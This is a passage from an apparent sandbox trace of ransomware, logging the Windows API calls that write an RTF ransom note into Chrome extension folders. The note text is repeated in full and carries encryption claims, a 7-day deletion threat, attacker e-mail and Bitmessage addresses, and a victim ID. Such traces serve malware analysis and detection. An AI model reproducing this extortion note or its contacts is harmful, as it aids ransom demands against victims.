vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0284.750] WriteFile (in: hFile=0x228, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.751] CloseHandle (hObject=0x228) returned 1 [0284.751] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\#readme_eman#.rtf")) returned 0xffffffff [0284.751] GetLastError () returned 0x2 [0284.751] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0284.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 